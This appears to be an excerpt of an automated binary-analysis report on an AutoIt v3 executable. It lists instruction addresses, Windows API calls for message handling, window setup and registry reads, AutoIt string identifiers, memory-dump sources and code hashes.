                                          							goto L11;
                                          						}
                                          					}
                                          					goto L53;
                                          				}
                                          			}
                                          0x00df5419
                                          0x00df541a
                                          0x00df5420
                                          0x00000000
                                          0x00000000
                                          0x00df5426
                                          0x00df542a
                                          0x00df542e
                                          0x00df5430
                                          0x00000000
                                          0x00000000
                                          0x00df5432
                                          0x00df5432
                                          0x00000000
                                          0x00000000
                                          0x00df544e
                                          0x00df5456
                                          0x00000000
                                          0x00000000
                                          0x00df545c
                                          0x00df5460
                                          0x00df5462
                                          0x00df5465
                                          0x00df5465
                                          0x00000000
                                          0x00000000
                                          0x00df547c
                                          0x00df5480
                                          0x00df5484
                                          0x00df5486
                                          0x00000000
                                          0x00000000
                                          0x00df5488
                                          0x00df548a
                                          0x00df548a
                                          0x00df548f
                                          0x00df5493
                                          0x00df5493
                                          0x00df5498
                                          0x00000000
                                          0x00000000
                                          0x00df546c
                                          0x00df5470
                                          0x00df5472
                                          0x00df5475
                                          0x00df5475
                                          0x00000000
                                          0x00000000
                                          0x00df53ef
                                          0x00df53dd
                                          0x00000000
                                          0x00df53fe
                                          0x00df5336
                                          0x00df5336
                                          0x00df5337
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00df5337
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00df52d9
                                          0x00df52d9
                                          0x00df52dc
                                          0x00df52de
                                          0x00df52e1
                                          0x00df52ed
                                          0x00df52ed
                                          0x00df52ed
                                          0x00000000
                                          0x00df52ed
                                          0x00df52e3
                                          0x00df52e6
                                          0x00000000
                                          0x00000000
                                          0x00df52e8
                                          0x00000000
                                          0x00df52ee
                                          0x00df52ee
                                          0x00df52f1
                                          0x00df52f1
                                          0x00df52f8
                                          0x00df52fc
                                          0x00000000
                                          0x00df54ca
                                          0x00df54d3
                                          0x00df54d8
                                          0x00df54de
                                          0x00df54df
                                          0x00df54e3
                                          0x00df54e7
                                          0x00df54e7
                                          0x00000000
                                          0x00df52bf
                                          0x00df5145
                                          0x00df5145
                                          0x00df5148
                                          0x00df514c
                                          0x00df514c
                                          0x00df514f
                                          0x00df5153
                                          0x00df5156
                                          0x00df515b
                                          0x00000000
                                          0x00000000
                                          0x00df515d
                                          0x00df5161
                                          0x00df5164
                                          0x00df5164
                                          0x00df5168
                                          0x00df516d
                                          0x00df5182
                                          0x00df5185
                                          0x00df5187
                                          0x00df518a
                                          0x00000000
                                          0x00000000
                                          0x00df518c
                                          0x00df518f
                                          0x00df521b
                                          0x00df5232
                                          0x00000000
                                          0x00df5232
                                          0x00000000
                                          0x00df518f
                                          0x00df5176
                                          0x00df5178
                                          0x00000000
                                          0x00000000
                                          0x00df517e
                                          0x00000000
                                          0x00df5195
                                          0x00df5195
                                          0x00df5199
                                          0x00df519a
                                          0x00df519a
                                          0x00df51a1
                                          0x00df51a5
                                          0x00df51a5
                                          0x00df51a9
                                          0x00df51aa
                                          0x00df51af
                                          0x00df51d5
                                          0x00df51de
                                          0x00df51e7
                                          0x00df51e8
                                          0x00df51ec
                                          0x00df51f1
                                          0x00df51f4
                                          0x00df51f8
                                          0x00df51fc
                                          0x00df51ff
                                          0x00df5290
                                          0x00df5294
                                          0x00000000
                                          0x00df5294
                                          0x00df5205
                                          0x00df514c
                                          0x00df514f
                                          0x00df5153
                                          0x00df5156
                                          0x00df515b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00df515b
                                          0x00df51b1
                                          0x00df51b5
                                          0x00df51b6
                                          0x00df51b6
                                          0x00df51b8
                                          0x00df51bb
                                          0x00df51bf
                                          0x00df51c3
                                          0x00000000
                                          0x00000000
                                          0x00df51c5
                                          0x00df51c5
                                          0x00df5218
                                          0x00df5218
                                          0x00df51bb
                                          0x00df51bf
                                          0x00df51c3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00df51c8
                                          0x00df51c8
                                          0x00df51cc
                                          0x00df520e
                                          0x00df5212
                                          0x00000000
                                          0x00000000
                                          0x00df5214
                                          0x00df5216
                                          0x00df51d1
                                          0x00df51d1
                                          0x00000000
                                          0x00df51d1
                                          0x00000000
                                          0x00df5216
                                          0x00df51ce
                                          0x00df51ce
                                          0x00df51cf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00df51cf
                                          0x00df51b8
                                          0x00df514c
                                          0x00dc0bda
                                          0x00dc0be1
                                          0x00df5702
                                          0x00df5709
                                          0x00000000
                                          0x00000000
                                          0x00df5716
                                          0x00df571b
                                          0x00df5728
                                          0x00df572d
                                          0x00df572f
                                          0x00000000
                                          0x00000000
                                          0x00df5735
                                          0x00df573d
                                          0x00000000
                                          0x00000000
                                          0x00df574e
                                          0x00df5750
                                          0x00df5752
                                          0x00000000
                                          0x00000000
                                          0x00df575b
                                          0x00df5766
                                          0x00df5771
                                          0x00df577c
                                          0x00df5794
                                          0x00df579f
                                          0x00df57a6
                                          0x00df57c2
                                          0x00df57ce
                                          0x00df57d3
                                          0x00df57e5
                                          0x00df57f1
                                          0x00df57f8
                                          0x00df57fd
                                          0x00df5804
                                          0x00000000
                                          0x00df5804
                                          0x00df580e
                                          0x00df5815
                                          0x00df5815
                                          0x00dc0be7
                                          0x00dc0be7
                                          0x00dc0bf0
                                          0x00df5827
                                          0x00df582d
                                          0x00df5831
                                          0x00df5836
                                          0x00000000
                                          0x00000000
                                          0x00df5847
                                          0x00df5853
                                          0x00df585d
                                          0x00df587c
                                          0x00df587c
                                          0x00df5887
                                          0x00df5889
                                          0x00dc0f38
                                          0x00dc0f38
                                          0x00dc0f3f
                                          0x00000000
                                          0x00dc0f3f
                                          0x00dc0bf9
                                          0x00dc0e5f
                                          0x00dc0e61
                                          0x00dc0e67
                                          0x00dc0e6e
                                          0x00dc0e91
                                          0x00dc0e91
                                          0x00dc0e97
                                          0x00dc0e9a
                                          0x00000000
                                          0x00000000
                                          0x00df59da
                                          0x00df59dd
                                          0x00df59e0
                                          0x00000000
                                          0x00df59e6
                                          0x00df59e6
                                          0x00000000
                                          0x00df5a18
                                          0x00df5a1a
                                          0x00000000
                                          0x00000000
                                          0x00df5a01
                                          0x00df5a03
                                          0x00000000
                                          0x00000000
                                          0x00df59ed
                                          0x00df59ef
                                          0x00df5a1f
                                          0x00df5a1f
                                          0x00df5a21
                                          0x00df5a23
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00df59f6
                                          0x00df59f8
                                          0x00df5a08
                                          0x00df5a08
                                          0x00df5a0a
                                          0x00df5a0c
                                          0x00df5a25
                                          0x00df5a31
                                          0x00df5a33
                                          0x00df5a38
                                          0x00df5a3d
                                          0x00df5a4b
                                          0x00df5a4d
                                          0x00df5a52
                                          0x00df5a54
                                          0x00df5a54
                                          0x00000000
                                          0x00000000
                                          0x00df5a5a
                                          0x00df5a5c
                                          0x00df5ad7
                                          0x00df5ad7
                                          0x00df5add
                                          0x00df5ae4
                                          0x00df5aee
                                          0x00000000
                                          0x00df5aee
                                          0x00df5a5e
                                          0x00df5a5e
                                          0x00df5a64
                                          0x00df5a67
                                          0x00df5a6e
                                          0x00df5a7b
                                          0x00df5a86
                                          0x00df5a91
                                          0x00df5a9e
                                          0x00df5aac
                                          0x00df5aba
                                          0x00df5ac4
                                          0x00df5ac6
                                          0x00df5ad2
                                          0x00000000
                                          0x00df5ad2
                                          0x00df5a69
                                          0x00df5a6c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00df5a6c
                                          0x00df5a0e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00df59e6
                                          0x00df59e0
                                          0x00dc0e70
                                          0x00dc0e76
                                          0x00dc0e7b
                                          0x00dc0e7d
                                          0x00000000
                                          0x00000000
                                          0x00dc0e7f
                                          0x00dc0f2f
                                          0x00dc0f2f
                                          0x00dc0f36
                                          0x00dc0fa3
                                          0x00000000
                                          0x00dc0fa3
                                          0x00000000
                                          0x00dc0f36
                                          0x00dc0e85
                                          0x00dc0e8b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00dc0e8b
                                          0x00dc0c02
                                          0x00df5afa
                                          0x00df5b00
                                          0x00df5b07
                                          0x00df5b35
                                          0x00df5b35
                                          0x00df5b3b
                                          0x00df5b3d
                                          0x00df5b42
                                          0x00df5b46
                                          0x00df5b49
                                          0x00df5b73
                                          0x00df5b76
                                          0x00000000
                                          0x00000000
                                          0x00df5b7c
                                          0x00df5b7c
                                          0x00df5b82
                                          0x00df5b87
                                          0x00df5b8b
                                          0x00df5b8d
                                          0x00df5bd5
                                          0x00df5bd5
                                          0x00df5bdc
                                          0x00df5c10
                                          0x00df5c10
                                          0x00df5c12
                                          0x00df5bde
                                          0x00df5bde
                                          0x00df5be2
                                          0x00df5be6
                                          0x00df5be8
                                          0x00df5bea
                                          0x00df5bea
                                          0x00df5bf0
                                          0x00df5bf8
                                          0x00df5bff
                                          0x00df5c01
                                          0x00df5c01
                                          0x00df5c1d
                                          0x00df5c24
                                          0x00df5c2e
                                          0x00000000
                                          0x00df5c2e
                                          0x00df5b95
                                          0x00df5b9b
                                          0x00df5ba3
                                          0x00df5bbb
                                          0x00df5bc1
                                          0x00df5bc7
                                          0x00df5bcb
                                          0x00000000
                                          0x00df5bcb
                                          0x00df5bb3
                                          0x00df5bb5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00df5bb5
                                          0x00df5b50
                                          0x00df5b56
                                          0x00df5b5a
                                          0x00df5b5f
                                          0x00df5b62
                                          0x00df5b67
                                          0x00000000
                                          0x00000000
                                          0x00df5b6d
                                          0x00000000
                                          0x00df5b6d
                                          0x00df5b09
                                          0x00df5b0f
                                          0x00df5b14
                                          0x00df5b16
                                          0x00000000
                                          0x00000000
                                          0x00df5b18
                                          0x00df5b22
                                          0x00df5b22
                                          0x00df5b28
                                          0x00df5b2a
                                          0x00df5864
                                          0x00df586a
                                          0x00df586a
                                          0x00df5874
                                          0x00000000
                                          0x00df5874
                                          0x00df5b1a
                                          0x00df5b20
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00dc0c11
                                          0x00dc0c14
                                          0x00000000
                                          0x00dc0c35
                                          0x00dc0c35
                                          0x00dc0c38
                                          0x00dc0c3b
                                          0x00dc0c41
                                          0x00dc0c47
                                          0x00df59cb
                                          0x00df59cb
                                          0x00000000
                                          0x00dc0c55
                                          0x00dc0c58
                                          0x00dc0c5e
                                          0x00000000
                                          0x00000000
                                          0x00dc0c67
                                          0x00dc0c6e
                                          0x00dc0c72
                                          0x00dc0c76
                                          0x00dc0c7a
                                          0x00dc0c7c
                                          0x00dc0c80
                                          0x00dc0c84
                                          0x00dc0c88
                                          0x00dc0c8e
                                          0x00dc0d68
                                          0x00dc0d6b
                                          0x00dc0d7a
                                          0x00dc0d7b
                                          0x00dc0d7e
                                          0x00df58ea
                                          0x00df58f9
                                          0x00dc0da6
                                          0x00dc0da6
                                          0x00dc0da8
                                          0x00dc0ca0
                                          0x00dc0ca0
                                          0x00dc0ca6
                                          0x00dc0de6
                                          0x00dc0deb
                                          0x00dc0dee
                                          0x00df5921
                                          0x00df592c
                                          0x00df5931
                                          0x00df5931
                                          0x00dc0df5
                                          0x00dc0dfa

                                          APIs
                                          • PeekMessageW.USER32 ref: 00DC0A5B
                                          • timeGetTime.WINMM ref: 00DC0D16
                                          • PeekMessageW.USER32 ref: 00DC0E53
                                          • Sleep.KERNEL32(0000000A), ref: 00DC0E61
                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00DC0EFA
                                          • DestroyWindow.USER32 ref: 00DC0F06
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DC0F20
                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00DF4E83
                                          • TranslateMessage.USER32(?), ref: 00DF5C60
                                          • DispatchMessageW.USER32 ref: 00DF5C6E
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DF5C82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                           • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                           • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb$pb$pb$pb
                                          • API String ID: 4212290369-1420604165
                                          • Opcode ID: c6d30a465a20aaafb5c96405d3e1069a3d3707e1e0ece2a75b0e60963adc59e8
                                          • Instruction ID: f6c2602b8647eb827a52ec8650c88b8517483fb55037a0eef6446ccb54faacfb
                                          • Opcode Fuzzy Hash: c6d30a465a20aaafb5c96405d3e1069a3d3707e1e0ece2a75b0e60963adc59e8
                                          • Instruction Fuzzy Hash: DCB2C370608745DFD724DF24D844FAABBE4FF85304F19891DE69A972A1C770E884CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB7BCC: _memmove.LIBCMT ref: 00DB7C06
                                          • GetForegroundWindow.USER32(00E3F910,?,?,?,?,?), ref: 00DC5EE2
                                          • IsWindow.USER32(?), ref: 00E00C23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                           • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                           • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Foreground_memmove
                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                          • API String ID: 3828923867-1919597938
                                          • Opcode ID: 516cd303f2e40416ff68ce4b39eef6cbc5b5799317f46d5501d7c04bc966cf85
                                          • Instruction ID: 951767d057c59ec0e37d1c74c3d8430e240c3caf1351803ac279d226e319e3ff
                                          • Opcode Fuzzy Hash: 516cd303f2e40416ff68ce4b39eef6cbc5b5799317f46d5501d7c04bc966cf85
                                          • Instruction Fuzzy Hash: 36D1A530104702EBCB04EF54D485BAABBA4FF94348F14561DF496676E1DB30EA99CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DB3074
                                          • RegisterClassExW.USER32 ref: 00DB309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DB30AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 00DB30CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DB30DC
                                          • LoadIconW.USER32(000000A9), ref: 00DB30F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DB3101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                           • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                           • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: df033867626ed9d6fa7df6db2fc534b3a1ef983e9dfa88858c4b4d3d1d73f6ab
                                          • Instruction ID: 4a86b35278ab5670e973473baabc510dafd1a552c39b2f9672979c254f0dcac4
                                          • Opcode Fuzzy Hash: df033867626ed9d6fa7df6db2fc534b3a1ef983e9dfa88858c4b4d3d1d73f6ab
                                          • Instruction Fuzzy Hash: 3D3106B2D41309EFDB40CFA5E889AD9BBF4FB09310F14412AE584B62A0D7B50589CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DB3074
                                          • RegisterClassExW.USER32 ref: 00DB309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DB30AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 00DB30CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DB30DC
                                          • LoadIconW.USER32(000000A9), ref: 00DB30F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DB3101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                           • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                           • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 85a68d42024e0e5a15e2c77a0ea04ccade8543de926bccefe7412b9698d9db5e
                                          • Instruction ID: 6473dd0daa9ebf6db5d612eb5b8d62a5ba60359c6e4284327319ed873098dfae
                                          • Opcode Fuzzy Hash: 85a68d42024e0e5a15e2c77a0ea04ccade8543de926bccefe7412b9698d9db5e
                                          • Instruction Fuzzy Hash: 9821B4B2D11318AFEB00DFA6E989B9DBFF4FB08700F00412AF515B62A0D7B145888F95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00DB715A,?,?,?,?,00DB108C,?), ref: 00DB4724
                                            • Part of subcall function 00DD050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00DB7165,?,?,?,?,00DB108C,?), ref: 00DD052D
                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\,?,?,?,?,00DB108C,?), ref: 00DB71A8
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,?,?,?,00DB108C,?), ref: 00DEE8C8
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,?,?,00DB108C,?), ref: 00DEE909
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00DB108C,?), ref: 00DEE947
                                          • _wcscat.LIBCMT ref: 00DEE9A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                           • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                           • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                           • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 2673923337-2727554177
                                          • Opcode ID: eb06efbdb90cf8882efcfb17b6eb49e9acb82b4ab578e5d3c8b8f054c121d4cb
                                          • Instruction ID: 3d2c51894555d909c3d44f764c6d3f445be0d425bad41ae778fea5cc5021bd73
                                          • Opcode Fuzzy Hash: eb06efbdb90cf8882efcfb17b6eb49e9acb82b4ab578e5d3c8b8f054c121d4cb
                                          • Instruction Fuzzy Hash: C0717F715087419EC744EF26EC819ABBBE8FF84354F44092EF449A72B2DB719988CB71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00DB36D2
                                          • KillTimer.USER32(?,00000001), ref: 00DB36FC
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DB371F
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DB372A
                                          • CreatePopupMenu.USER32 ref: 00DB373E
                                          • PostQuitMessage.USER32(00000000), ref: 00DB374D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated$%
                                          • API String ID: 129472671-3835587964
                                          • Opcode ID: e8a6c7bb8144980fa771228864ac0ef95158be0c54e7c9afebd9e734ace92efc
                                          • Instruction ID: c0e85b8dd69daee9e3d002ab5c51175a36bb47390bd36b59ded844d1a3f77ccc
                                          • Opcode Fuzzy Hash: e8a6c7bb8144980fa771228864ac0ef95158be0c54e7c9afebd9e734ace92efc
                                          • Instruction Fuzzy Hash: F64128B2110949FFDB14AF69DC09BF93B55EB00300F580125F547A62B2DEA1DD58A671
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: __i64tow__itow__swprintf
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 421087845-2263619337
                                          • Opcode ID: 92c585e9ce92e3c0ba752da828311710871f1153ab1d07839c1eeead65901742
                                          • Instruction ID: 518de9443c9cdd3940e256de8698dc6fefb01d7ddd1710cb7238828ce3dfe440
                                          • Opcode Fuzzy Hash: 92c585e9ce92e3c0ba752da828311710871f1153ab1d07839c1eeead65901742
                                          • Instruction Fuzzy Hash: 9841E475500245EFDB24EF35D842EBAB7E9EF45310F24446EE58AD7291EA31E9018B30
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DB3A50
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00DB3A5F
                                          • LoadIconW.USER32(00000063), ref: 00DB3A76
                                          • LoadIconW.USER32(000000A4), ref: 00DB3A88
                                          • LoadIconW.USER32(000000A2), ref: 00DB3A9A
                                          • LoadImageW.USER32 ref: 00DB3AC0
                                          • RegisterClassExW.USER32 ref: 00DB3B16
                                            • Part of subcall function 00DB3041: GetSysColorBrush.USER32(0000000F), ref: 00DB3074
                                            • Part of subcall function 00DB3041: RegisterClassExW.USER32 ref: 00DB309E
                                            • Part of subcall function 00DB3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DB30AF
                                            • Part of subcall function 00DB3041: InitCommonControlsEx.COMCTL32(?), ref: 00DB30CC
                                            • Part of subcall function 00DB3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DB30DC
                                            • Part of subcall function 00DB3041: LoadIconW.USER32(000000A9), ref: 00DB30F2
                                            • Part of subcall function 00DB3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DB3101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: 10b887b3adc849aee01319f50ef459883cb851ba9ec07c7e717fa716f51010e2
                                          • Instruction ID: 78d38dcbfdcdf66f9c4c903a9fdc17b5199b4aa47abc0a666b70d7a79039d92d
                                          • Opcode Fuzzy Hash: 10b887b3adc849aee01319f50ef459883cb851ba9ec07c7e717fa716f51010e2
                                          • Instruction Fuzzy Hash: 8B212972D10348AFEB10DFA6EC09B9D7FB1EB08711F10051AF608B62B2D7B555989F94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R
                                          • API String ID: 1825951767-347772802
                                          • Opcode ID: f52d718de36cf49cc356a310be75c636b8cd1119afe4cf5f03785d9b52c2f715
                                          • Instruction ID: 49769175610bd0de29f1577acde76e0cf5eb05a41f9f5291001ef89824623184
                                          • Opcode Fuzzy Hash: f52d718de36cf49cc356a310be75c636b8cd1119afe4cf5f03785d9b52c2f715
                                          • Instruction Fuzzy Hash: D8A1597290025DDADF04EBA5DC95AEEB779FF15300F44052AF416B6192EF70AA08DBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DD0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DD0193
                                            • Part of subcall function 00DD0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DD019B
                                            • Part of subcall function 00DD0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DD01A6
                                            • Part of subcall function 00DD0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DD01B1
                                            • Part of subcall function 00DD0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DD01B9
                                            • Part of subcall function 00DD0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DD01C1
                                            • Part of subcall function 00DC60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00DBF930), ref: 00DC6154
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DBF9CD
                                          • OleInitialize.OLE32(00000000), ref: 00DBFA4A
                                          • CloseHandle.KERNEL32(00000000), ref: 00DF45C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                          • String ID: <W$\T$%$S
                                          • API String ID: 1986988660-191198415
                                          • Opcode ID: b4cb991a97c7cc7feeddedc55a74ccebd4bf16c7ced93c7e79149a7717f1e74f
